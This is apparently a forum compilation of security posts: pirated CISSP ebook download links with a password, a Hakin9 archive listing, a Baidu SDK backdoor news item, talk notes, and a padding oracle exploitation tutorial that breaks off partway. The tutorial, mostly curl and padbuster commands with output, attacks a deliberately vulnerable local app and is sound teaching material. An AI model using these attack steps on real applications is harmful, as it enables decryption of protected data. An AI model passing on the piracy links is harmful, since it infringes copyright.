[[eBook] Certified Information Systems Security Professional Official Study Guide]

Certified Information Systems Security Professional Official Study Guide, 7th Edition

(ISC)2 Official Study Guide - Seventh Edition

Authors: James Michael Stewart

Mike Chapple

Darril Gibson

Covers 100% of exam 2015 CISSP candidate information bulletin objectives including. Access Control, Application Development Security, Business Continuity and Disaster Recovery Planning, Cryptography and much more...

Includes interactive online learning environment and study tools with:

• 
  
• More than 1,400 practice questions
  
• More than 1000 electronic flashcards
  
• Searchable key term glossary
  
• Interactive test engine
  
• 
  

Read:

https://www.scribd.com/doc/293003196/CISSP

Download:

https://www.sendspace.com/file/funa4o

Password:

rstforums.com

[Colectie Hakin9 Magazine (2005-2013)]

@m3gatr0n

multumesc, astea sunt:

   Tutorials
   2005\Hakin9 (01_2005) - Cisco IOS Insecurity.pdf
   2005\Hakin9 (02_2005) - Vulnerable Mobiles.pdf
   2005\Hakin9 (03_2005) - Snooping On Monitor Displays.pdf
   2005\Hakin9 (04_2005) - Hacking BlueTooth.pdf
   2005\Hakin9 (05_2005) - Anatomy of Pharming.pdf
   2006\Hakin9 (01_2006) - Rootkits Under Windows.pdf
   2006\Hakin9 (02_2006) - Fighting Malicious Code.pdf
   2007\Hakin9 (01_2007) - Taking Control of a Running Process.pdf
   2007\Hakin9 (02_2007) - Timing Attacks.pdf
   2007\Hakin9 (03_2007) - Haking Oracle.pdf
   2007\Hakin9 (04_2007) - Haking Microsoft's .Net.pdf
   2007\Hakin9 (05_2007) - Online Fraud Danger.pdf
   2007\Hakin9 (06_2007) - Rootkits For Windows.pdf
   2007\Hakin9 STARTER_KIT (01_2007) - Searching For Google's Secrets.pdf
   2007\Hakin9 STARTER_KIT (02_2007) - Knock Knock Knocking.pdf
   2007\Hakin9 STARTER_KIT (03_2007) - Exploiting Software.pdf
   2008\Hakin9 (01_2008) - No Backdoor Try Opening The Windows.pdf
   2008\Hakin9 (02_2008) - VOIP Abuse.pdf
   2008\Hakin9 (03_2008) - LDAP Cracking.pdf
   2008\Hakin9 (04_2008) - File Inclusion Attacks.pdf
   2008\Hakin9 (05_2008) - Kernal Hacking.pdf
   2008\Hakin9 (06_2008) - Hacking WiFi.pdf
   2009\Hakin9 (01_2009) - Haking Instant Messenger.pdf
   2009\Hakin9 (02_2009) - The Real World Click Jacking.pdf
   2009\Hakin9 (03_2009) - Breaking Client-Side Certificate Protection.pdf
   2009\Hakin9 (04_2009) - My ERP Got Hacked.pdf
   2009\Hakin9 (05_2009) - 21st Century Hacking Techniques.pdf
   2009\Hakin9 (06_2009) - Windows FE.pdf
   2009\Hakin9 TBO (01_2009).pdf
   2010\Hakin9 (10_2010) - Spyware.pdf
   2010\Hakin9 (11_2010) - Botnets, Malware, Spyware How to Fight Back.pdf
   2010\Hakin9 (1_2010) -Hardware Keylogger A Serious Threat.pdf
   2010\Hakin9 (2_2010) - Mobile Exploitation.pdf
   2010\Hakin9 (3_2010) - Analyzing Malware and Malicious Content.pdf
   2010\Hakin9 (4_2010) - Flash Memory Mobile Forensic.pdf
   2010\Hakin9 (5_2010) - Is DDOS Still A Threat.pdf
   2010\Hakin9 (6_2010) - Securing VOIP.pdf
   2010\Hakin9 (7_2010) - Securing The Cloud.pdf
   2010\Hakin9 (8_2010) - Mobile Malware The New Cyber Threat.pdf
   2010\Hakin9 (9_2010) - Email Security.pdf
   2010\Hakin9 STARTER_KIT (01_2010) - Snort Exposed.pdf
   2010\Hakin9 TBO (01_2010).pdf
   2011\Hakin 9
   2011\Hakin9 Exploiting Software
   2011\Hakin9 Extra
   2011\Hakin9 Mobile Security
   2011\Hakin9 Starter Kit
   2011\Hakin 9\Hakin9 (01_2011) - Cybercrime and Cyber War Predictions for 2011.pdf
   2011\Hakin 9\Hakin9 (02_2011) - Network Security.pdf
   2011\Hakin 9\Hakin9 (03_2011) - ID Theft.pdf
   2011\Hakin 9\Hakin9 (04_2011) - Mobile Security.pdf
   2011\Hakin 9\Hakin9 (05_2011) - Cloud Security.pdf
   2011\Hakin 9\Hakin9 (06_2011) - Insecure Access Control.pdf
   2011\Hakin 9\Hakin9 (07_2011) - Web App Security.pdf
   2011\Hakin 9\Hakin9 (08_2011) - Hackin RFID.pdf
   2011\Hakin 9\Hakin9 (09_2011) - Secure Coding.pdf
   2011\Hakin 9\Hakin9 (10_2011) - Hack Apple.pdf
   2011\Hakin 9\Hakin9 (11_2011) - Hacking Data.pdf
   2011\Hakin 9\Hakin9 (12_2011) - TOR Project.pdf
   2011\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (01_2011) - Smashing The Stack.pdf
   2011\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (02_2011) - Exploit Format Strings With Python.pdf
   2011\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (03_2011) - Password What Password.pdf
   2011\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (04_2011) - ShellCode.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (01_2011) - Exploiting Software.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (02_2011) - ID Thefts.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (03_2011) - Forensics.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (04_2011) - Android Security.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (04_2011) - Wireless Security.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (05_2011) - Haking Botnet.pdf
   2011\Hakin9 Extra\Hakin9 EXTRA (06_2011) - Rootkit.pdf
   2011\Hakin9 Mobile Security\Hakin9 MOBILE SECURITY (01_2011) - IOS Vulnerability.pdf
   2011\Hakin9 Starter Kit\Hakin9 STARTER_KIT (01_2011) - Paypal Is A Scam.pdf
   2011\Hakin9 Starter Kit\Hakin9 STARTER_KIT (02_2011) - Termination The Internet.pdf
   2012\Hakin 9
   2012\Hakin9 BIBLE (01_2012).pdf
   2012\Hakin9 Exploiting Software
   2012\Hakin9 Extra
   2012\Hakin9 FOR_FREE (01_2012).pdf
   2012\Hakin9 Mobile Security
   2012\Hakin9 On Demand
   2012\TBO
   2012\Hakin 9\Hakin9 (01_2012) - SQL Injection.pdf
   2012\Hakin 9\Hakin9 (02_2012) - When I'm X64.pdf
   2012\Hakin 9\Hakin9 (03_2012) - DNS Cache Poisoning.pdf
   2012\Hakin 9\Hakin9 (04_2012) - Cyber Warfare.pdf
   2012\Hakin 9\Hakin9 (05_2012) - Cloud Computing.pdf
   2012\Hakin 9\Hakin9 (06_2012) - Biometrics.pdf
   2012\Hakin 9\Hakin9 (07_2012) - GreenSQL.pdf
   2012\Hakin 9\Hakin9 (08_2012) - Malware.pdf
   2012\Hakin 9\Hakin9 (09_2012) - Network Security.pdf
   2012\Hakin 9\Hakin9 (10_2012) - Hacking Oracle.epub
   2012\Hakin 9\Hakin9 (10_2012) - Hacking Oracle.pdf
   2012\Hakin 9\Hakin9 (11_2012) - Mobile Security.epub
   2012\Hakin 9\Hakin9 (11_2012) - Mobile Security.pdf
   2012\Hakin 9\Hakin9 (12_2012) - Enterprise Network Security.epub
   2012\Hakin 9\Hakin9 (12_2012) - Enterprise Network Security.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (01_2012) - Blackhole Exploint Kit.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (02_2012) - Hardening of Java Applications Against AOP.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (03_2012) - Security Onion.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (04_2012) - Cisco IOS Rootkits and Malware.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (05_2012) - Buffer Overflow.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (06_2012) - Pentesting With Android.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (07_2012) - SamuraiWTF Toolkit.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (08_2012) - Raspberry Pi Hacking.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (09_2012) - Metasploit In A Nutshell.epub
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (09_2012) - Metasploit In A Nutshell.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE - Bible.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer\crackme1.zip_
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer\crackme2.zip_
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer.epub
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer.pdf
   2012\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (10_2012) - A Manual To Reverse Engineer\odbg201f.zip_
   2012\Hakin9 Extra\Hakin9 EXTRA (01_2012) - Cryptography.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (02_2012) - Honeypots.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (03_2012) - Hacking Hardware.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (04_2012) - Forensics In The Cloud.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (05_2012) - Adobe Security.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (06_2012) - Timing Attacks.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (07_2012) - Quantum Computing.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (08_2012) - Helix.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (09_2012) - Webserver Security.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (10_2012) - How To Boost Your Cloud.pdf
   2012\Hakin9 Extra\Hakin9 EXTRA (11_2012) - Biometrics Security.epub
   2012\Hakin9 Extra\Hakin9 EXTRA (11_2012) - Biometrics Security.pdf
   2012\Hakin9 Mobile Security\Hakin9 MOBILE_SECURITY (01_2012) - Tag You're Infected.pdf
   2012\Hakin9 Mobile Security\Hakin9 MOBILE_SECURITY (02_2012) - Data Handling On IOS Devices.pdf
   2012\Hakin9 Mobile Security\Hakin9 MOBILE_SECURITY (03_2012) - Mobile Device Security.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (01_2012) - SQL Injection.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (02_2012) - Torjan-izing USB Stics.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (03_2012) - The Guide to Backtrack.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (04_2012) - Network Security.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (05_2012) - Connection Overload.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (06_2012) - Ultimate Nessus 5 Tutorial.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (07_2012) - Wireshark Sharks On The Wire.epub
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (07_2012) - Wireshark Sharks On The Wire.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (08_2012) - Exploiting Linux Kernal.epub
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (08_2012) - Exploiting Linux Kernal.pdf
   2012\Hakin9 On Demand\Hakin9 ON_DEMAND (09_2012) - Wireshark Sharks On The Wire 2.pdf
   2012\TBO\Hakin9 TBO (01_2012) - The Ultimate Guide To Mobile Security.pdf
   2012\TBO\Hakin9 TBO (03_2012) - Best of Network Scanning.pdf
   2013\Hakin 9
   2013\Hakin9 Exploiting Software
   2013\Hakin9 Extra
   2013\Hakin9 On Demand
   2013\Hakin9 Open
   2013\Hakin9 Starter Kit
   2013\Hakin9 TBO
   2013\Python Triple Pack
   2013\Hakin 9\Hakin9 (01_2013) - Fight The Spyware.epub
   2013\Hakin 9\Hakin9 (01_2013) - Fight The Spyware.pdf
   2013\Hakin 9\Hakin9 (02_2013) - DDOS Tutorials.pdf
   2013\Hakin 9\Hakin9 (03_2013) - Hacking Android.epub
   2013\Hakin 9\Hakin9 (03_2013) - Hacking Android.pdf
   2013\Hakin 9\Hakin9 (04_2013) - A Guide To NMAP The Second Encounter.epub
   2013\Hakin 9\Hakin9 (04_2013) - A Guide To NMAP The Second Encounter.pdf
   2013\Hakin 9\Hakin9 (05_2013) - Offensive Programming.epub
   2013\Hakin 9\Hakin9 (05_2013) - Offensive Programming.pdf
   2013\Hakin 9\Hakin9 (06_2013) - Advanced Malware Analysis.epub
   2013\Hakin 9\Hakin9 (06_2013) - Advanced Malware Analysis.pdf
   2013\Hakin 9\Hakin9 (07_2013) - QR Code Haking.epub
   2013\Hakin 9\Hakin9 (07_2013) - QR Code Haking.pdf
   2013\Hakin 9\Hakin9 (08_2013) - C++ Vs Python.epub
   2013\Hakin 9\Hakin9 (08_2013) - C++ Vs Python.pdf
   2013\Hakin 9\Hakin9 (09_2013) - Network Security & SQL Injection.pdf
   2013\Hakin 9\Hakin9_20_12_2013.pdf
   2013\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (01_2013) - Exploiting SAP.epub
   2013\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE (01_2013) - Exploiting SAP.pdf
   2013\Hakin9 Exploiting Software\Hakin9 EXPLOITING_SOFTWARE TBO (01_2013) - Metasploit Tutorials.pdf
   2013\Hakin9 Extra\Hakin9 EXTRA (01_2013) - Backtrack 5 R3.epub
   2013\Hakin9 Extra\Hakin9 EXTRA (01_2013) - Backtrack 5 R3.pdf
   2013\Hakin9 Extra\Hakin9 EXTRA (02_2013) - Mobile Hacking.epub
   2013\Hakin9 Extra\Hakin9 EXTRA (02_2013) - Mobile Hacking.pdf
   2013\Hakin9 Extra\Hakin9 EXTRA (03_2013) - Guide To Kali Linux.epub
   2013\Hakin9 Extra\Hakin9 EXTRA (03_2013) - Guide To Kali Linux.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (01_2013) - CyberSecurity.epub
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (01_2013) - CyberSecurity.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (02_2013) - Internet Based World Security.epub
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (02_2013) - Internet Based World Security.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (03_2013) - Reverse Engineering Tutorials.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (04_2013) - Advanced Web Attacks and Exploitations.epub
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (04_2013) - Advanced Web Attacks and Exploitations.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (05_2013) - Advanced Windows Exploitations.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (06_2013) - BIOS Security.epub
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (06_2013) - BIOS Security.pdf
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (07_2013) - Exploitation Compendium.epub
   2013\Hakin9 On Demand\Hakin9 ON_DEMAND (07_2013) - Exploitation Compendium.pdf
   2013\Hakin9 Open\Hakin9 OPEN (01_2013) - How To Use Metasploit For Security Defense.epub
   2013\Hakin9 Open\Hakin9 OPEN (01_2013) - How To Use Metasploit For Security Defense.pdf
   2013\Hakin9 Open\Hakin9 OPEN (02_2013) - How To Brute Force Drupal 6 Login Pages.epub
   2013\Hakin9 Open\Hakin9 OPEN (02_2013) - How To Brute Force Drupal 6 Login Pages.pdf
   2013\Hakin9 Open\Hakin9 OPEN (03_2013) - How To Detect System Intrusion.pdf
   2013\Hakin9 Open\Hakin9 OPEN (04_2013) - Cyber Threats Solutions.epub
   2013\Hakin9 Open\Hakin9 OPEN (04_2013) - Cyber Threats Solutions.pdf
   2013\Hakin9 Starter Kit\Hakin9 STARTER_KIT (01_2013) - Beginners Guide To Hacking
   2013\Hakin9 Starter Kit\Hakin9 STARTER_KIT (02_2013) - A Beginners Guide To Software Exploitation.pdf
   2013\Hakin9 Starter Kit\Hakin9 STARTER_KIT (03_2013) - How To Pentest With BackTrack.pdf
   2013\Hakin9 Starter Kit\Hakin9 STARTER_KIT (01_2013) - Beginners Guide To Hacking\Hakin9 STARTER_KIT (01_2013) - Beginners Guide To Hacking.pdf
   2013\Hakin9 Starter Kit\Hakin9 STARTER_KIT (01_2013) - Beginners Guide To Hacking\helloworld.exe
   2013\Hakin9 TBO\Hakin9 TBO (01_2013) - Wifi Hacking.pdf
   2013\Hakin9 TBO\Hakin9 TBO (02_2013) - Exploiting Software.pdf
   2013\Hakin9 TBO\Hakin9 TBO (03_2013) - Advanced Backtrack Set.pdf
   2013\Python Triple Pack\Software Developer Journal - Python Programming (12_2013).pdf
   2013\Python Triple Pack\Software Developer Journal - Python Starter Kit (13_2013).pdf
   Hakin9 Ebooks\Defend Yourself
   Hakin9 Ebooks\Don't Be Mocked Secure Your System.pdf
   Hakin9 Ebooks\Low Tech Hacking.pdf
   Hakin9 Ebooks\Malware - From Basic Cleaning To Anaylsing.pdf
   Hakin9 Ebooks\Nmap Guide
   Hakin9 Ebooks\Public Key Cryptostructure
   Hakin9 Ebooks\Defend Yourself\Defend Yourself.epub
   Hakin9 Ebooks\Defend Yourself\Defend Yourself.pdf
   Hakin9 Ebooks\Nmap Guide\Nmap Guide.epub
   Hakin9 Ebooks\Nmap Guide\Nmap Guide.pdf
   Hakin9 Ebooks\Public Key Cryptostructure\Public Key Cryptostructure.epub
   Hakin9 Ebooks\Public Key Cryptostructure\Public Key Cryptostructure.pdf
   Tutorials\CEHv7 - Study Guide 1.pdf
   Tutorials\CEHv7 - Study Guide 2.pdf
   Tutorials\CEHv7 - Study Guide 3.pdf
   Tutorials\Crypto Tutorial 1.pdf
   Tutorials\Crypto Tutorial 2.pdf
   Tutorials\Crypto Tutorial 3.pdf
   Tutorials\Crypto Tutorial 4.pdf
   Tutorials\Metasploit and SET Install on Apple iDevice.pdf

[Portmanteau Unix Driver IOCTL Security Tool]

Portmanteau is an experimental unix driver IOCTL security tool that is useful for fuzzing and discovering device driver attack surface.

Download:

https://packetstormsecurity.com/files/download/134230/portmanteau-release.tar.gz

https://packetstormsecurity.com/files/134230/Portmanteau-Unix-Driver-IOCTL-Security-Tool.html

[Backdoor in Baidu Android SDK Puts 100 Million Devices at Risk]

The China's Google-like Search Engine Baidu is offering a software development kit (SDK) that contains functionality that can be abused to give backdoor-like access to a user's device, potentially exposing around 100 Million Android users to malicious hackers.

The SDK in question is Moplus, which may not be directly available to the public but has already made its way into more than 14,000 Android apps, of which around 4,000 are actually created by Baidu.

Overall, more than 100 Million Android users, who have downloaded these apps on their smartphones, are in danger.

Security researchers from Trend Micro have discovered a vulnerability in the Moplus SDK, called Wormhole, that allows attackers to launch an unsecured and unauthenticated HTTP server connection on affected devices, which works silently in the background, without the user's knowledge.

This unsecured server does not use authentication and can accept requests from anyone on the Internet. Though the server is controlled by the attacker, who can send requests to a particular port of this hidden HTTP server to execute malicious commands.

Malicious Functionalities of Wormhole

Currently, the researchers have identified that the SDK is using the port 6259 or 40310 to perform malicious activities on affected Android devices, which includes:

• Send SMS messages
  
• Make phone calls
  
• Get mobile phone details
  
• Add new contacts
  
• Get a list of local apps
  
• Download files on the device
  
• Upload files from the device
  
• Silently install other apps (if the phone is rooted)
  
• Push Web pages
  
• Get phone's geo-location, and many more
  

Since the SDK automatically installs the Web server when a Moplus SDK app is opened, hackers just need to scan a mobile network for port 6259 or 40310, thereby finding vulnerable devices they can abuse.

Wormhole is More Dangerous than Stagefright

The vulnerability, according to researchers, is potentially easier to exploit than the Stagefright flaw, as Wormhole doesn't require social engineering to infect an unsuspecting user.

Trend Micro has also found at least one malware strain (detected as ANDROIDOS_WORMHOLE.HRXA) in the wild that takes advantage of Wormhole in Moplus SDK.

Researchers informed both Baidu as well as Google of the vulnerability.

As a result, Baidu has just pushed a partial fix for the problem by releasing a new version of the SDK that removed some of the SDK's functionality, but not all. The HTTP server remains online and active; however, Baidu assured its users that no backdoor exists now.

This isn't the first time a Chinese company has caught distributing malicious SDK. Just a few days ago, the Taomike SDK – one of the biggest mobile ad solutions in China – was caught secretly spying on users' SMS messages and uploading them to a server in China.

The same malicious functionality was also discovered two weeks back in another SDK developed by Youmi; that affected 256 iOS apps, which were caught using private APIs to collect users private data. However, Apple eventually banned those apps from its App Store.

Via

[2015 - Glenn Ten Cate - OWASP SKF Making the web secure by design]

Will be a mixture of the workshops we already given and inspirational presentation. For an example you can check the workshop slides:

https://www.owasp.org/images/5/54/Skf-design-workshop.pptx.pdf

Via

[Python in a hacker's toolbox (PyConPl'15)]

Just a short note that the video from my talk "Python in a hacker's toolbox" (PyConPl'15) is already

. The slides can be found here.

Abstract:

A classical language set used by a security specialist included assembly and C, sometimes joined by C++ and usually quite a lot of Bash as well. A few years ago it seemed that Perl, and later Ruby, will become the scripting language of choice in the security field, however another contender - Python - was gaining user base too. Today it's rather obvious that Python won its place in the hacker's toolbox, especially given that a great deal of important tools of trade allow to be instrumented/scripted using it - examples include even the most basic utensils - IDA, GDB and Burp. Furthermore, Python with its set of standard libraries makes it extremely easy to create ad-hoc tools whenever they're needed. At the same time, due to rich introspection mechanisms, the language itself is an object of fascination from the security scene. The talk will focus on a few selected cases of Python intertwining with the security world.

The talk is basically a mix of Python related topics I've touched during other talks I gave (commonly with j00ru) - this includes:

• "Data, data, data..." (English, blog post + video)
  
• "On the battlefield with the dragons" (English, blog post + video)
  
• "Ataki na systemy i sieci komputerowe" (Polish, slides)
  
• "Pwning (sometimes) with style - Dragons' notes on CTFs" (English, slides)
  

Video:

Source

[Exploiting Padding Oracle to Gain Encryption Keys]

I wanted to share some practical tricks on exploiting a padding oracle vulnerability. This type of vulnerability allows an attacker to decrypt ciphertexts and encrypt plaintexts. More information on what the padding oracle attack is and how it works can be found in a previous blog post by Brian Holyfield.

The example app used for this blog post has additional flaws that allow recovery of the encryption key. We will use padbuster to run a padding oracle attack and see how the python-paddingoracle library can be used to create a custom exploit tool. You can find the vulnerable example app on GitHub.

The application decrypts a request parameter named ‘cipher’.

# curl http://127.0.0.1:5000/echo?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6

decrypted: ApplicationUsername=user&Password=sesame

We know that AES-128 with PKCS#5 padding and the same static password for both the encryption key and initialisation vector are used to encrypt and decrypt this value. There is no HMAC or other message integrity check.

Simple padding oracle scenario

The keywords PKCS#5 and no MAC indicate that the application might be vulnerable to a padding oracle attack. By flipping bits in the first block we can verify that there are no syntax checks performed on the decrypted data. And we can see that the app happily processes the garbage data in the first block:

# curl http://127.0.0.1:5000/echo?cipher=ff4b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6

decrypted: ?+?]7N?d?????N?me=user&Password=sesame

The next step is to check how the application reacts to incorrect padding. We can do this by flipping bits in the last block. It appears that the application returns ‘decryption error’ when the padding is incorrect.

# curl http://127.0.0.1:5000/echo?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4ff

decryption error

Now that we know that the application is vulnerable we can run padbuster to exploit it. I highly recommend reading Brian’s padbuster blog post and looking at the help output, but for convenience you can find the padbuster synopsis below:

padbuster URL EncryptedSample BlockSize [options]

In this scenario running padbuster is straightforward: The block size is 16 (16 bytes = 128 bits) and the only additional switch we need for now is -encoding 1 (lower case HEX).

# padbuster "http://127.0.0.1:5000/echo?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" 16 -encoding 1

+-------------------------------------------+

| PadBuster - v0.3.3                        |

| Brian Holyfield - Gotham Digital Science  |

| labs@gdssecurity.com                      |

+-------------------------------------------+

INFO: The original request returned the following

[+] Status: 200

[+] Location: N/A

[+] Content Length: 51

INFO: Starting PadBuster Decrypt Mode

*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------

ID#    Freq    Status    Length    Location

-------------------------------------------------------

1         1       200        42        N/A

2 **    255       200        16        N/A

-------------------------------------------------------

Enter an ID that matches the error condition

NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (24/256) [Byte 16]

[+] Success: (165/256) [Byte 15]

[snip]

Block 1 Results:

[+] Cipher Text (HEX): c59ca16e1f3645ef53cc6a4d9d87308e

[+] Intermediate Bytes (HEX): 2926e03c56d32edd338ffa923df059e9

[+] Plain Text: ame=user&Passwor

*** Starting Block 2 of 2 ***

[snip]

-------------------------------------------------------

** Finished ***

[+] Decrypted value (ASCII): ame=user&Password=sesame

[snip]

Note that it was not possible possible to recover the first block. Looking at the block diagram for CBC decryption below helps to understand why. By leveraging the padding oracle it would be possible to obtain the intermediate value after decrypting the first block (-noiv option in padbuster). However, we don’t know the IV to calculate the plaintext for the first block.

Attentive readers might have realised already that knowing the plaintext allows us to calculate the IV, which is used as the encryption key. This is explained in more detail further down.

To save time we could also specify the error string for invalid padding:

-error “decryption error”

A more complicated example

Now let’s look at a slightly more complicated scenario: The application does not return a dedicated error message for incorrect padding. Instead, the application parses the fields in the decrypted data and returns an error message if a required field is missing. In this case the required fields are ‘ApplicationUsername’ and ‘Password’.

Here is an example for a successful request: The ‘cipher’ parameter decrypts successfully and contains all required fields. The application responds with the decrypted value and all parsed fields.

# curl http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6

decrypted: ApplicationUsername=user&Password=sesame

parsed: {'Password': ['sesame'], 'ApplicationUsername': ['user']}

If we send a request that only contains a ‘Password’ field the application responds with ‘ApplicationUsername missing’.

# curl http://127.0.0.1:5000/echo?cipher=38d057b13b8aef21dbf9b43b66a6d89a

decrypted: Password=sesame

# curl http://127.0.0.1:5000/check?cipher=38d057b13b8aef21dbf9b43b66a6d89a

ApplicationUsername missing

In the case where the crypt value only contains an ‘ApplicationUsername’ field the application responds with ‘Password missing’.

# curl http://127.0.0.1:5000/echo?cipher=484b850123a04baf15df9be14e87369b309efe9c9fb71ea283dd42e445cc7b54

decrypted: ApplicationUsername=user

# curl http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369b309efe9c9fb71ea283dd42e445cc7b54

Password missing

When tampering with the last block the padding becomes invalid. As a result the application is not able to decrypt the ‘cipher’ parameter and returns ‘ApplicationUsername missing’.

# curl http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4ff

ApplicationUsername missing

Unfortunately, launching padbuster with minimal options fails: When it attempts to brute force the first block it always encounters the same error message (ApplicationUsername missing).

# padbuster "http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" 16 -encoding 1  

[snip]

ERROR: All of the responses were identical.

Double check the Block Size and try again.

But we can still leverage the order the application checks for the fields: It also returns ‘ApplicationUsername missing’ if the padding is invalid. We only need to prepend encrypted data that contains the ‘ApplicationUsername’ field: If the padding is correct then we get a different response. This way we can decrypt all but the first block.

In the example below the first two blocks of the ciphertext are prepended when performing the padding oracle attack. This is because the ‘ApplicationUsername’ field spans over two blocks (see Appendix).

# padbuster "http://127.0.0.1:5000/check?cipher=484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e"

+-------------------------------------------+

| PadBuster - v0.3.3                        |

| Brian Holyfield - Gotham Digital Science  |

| labs@gdssecurity.com                      |

+-------------------------------------------+

INFO: The original request returned the following

[+] Status: 200

[+] Location: N/A

[+] Content Length: 117

INFO: Starting PadBuster Decrypt Mode

*** Starting Block 1 of 2 ***

[snip]

-------------------------------------------------------

** Finished ***

[+] Decrypted value (ASCII): ame=user&Password=sesame

[snip]

Encrypt

We can also encrypt arbitrary content (Please refer to the original padbuster blog post on how this works behind the scenes). The only restriction is that it is not possible to control the first block. This is due to the static IV being used. The application would still accept the resulting ciphertext if we terminate the uncontrollable data of the first block with ‘=bla&’. Note that the crafted ciphertext does not have to have the same length as the original one.

